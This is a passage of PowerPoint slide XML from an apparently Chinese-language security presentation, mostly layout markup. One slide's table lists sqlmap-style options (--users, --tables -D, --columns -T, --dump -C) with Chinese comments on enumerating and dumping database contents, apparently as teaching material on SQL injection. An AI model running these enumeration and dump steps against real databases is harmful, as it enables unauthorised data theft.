                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>users</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>列数据库用户</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>current</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>当前用户</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>数据库</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>列举数据库的表名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>columns</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>数据库</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>获取表的列名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>dump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>数据库</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>获取表中的数据，包含列</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FDFDFD"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3695064285"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2650145461"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
